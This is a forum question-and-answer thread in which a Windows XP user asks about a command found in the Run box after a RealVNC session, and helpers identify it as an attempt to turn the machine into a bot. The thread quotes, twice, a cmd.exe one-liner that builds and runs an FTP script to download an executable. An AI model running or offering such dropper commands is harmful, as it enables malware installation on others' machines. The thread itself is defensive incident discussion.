EugeneGardner
asked on
Have I been hacked ?
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e
What does the above mean please ?
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e
What does the above mean please ?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900. Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
You probably should go back to GRC sheildsup and check port 5900. Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Ahh - good point. I'm running version 4.1.1 I have just downloaded version 4.1.2
Thanks.
Thanks.
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
FS-
ASKER
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected. And where would the e_53.exe file be dropped ? I can't find it anywhere. Another thing I don't understand is what would the point of running a script like that be ? There is no execute command !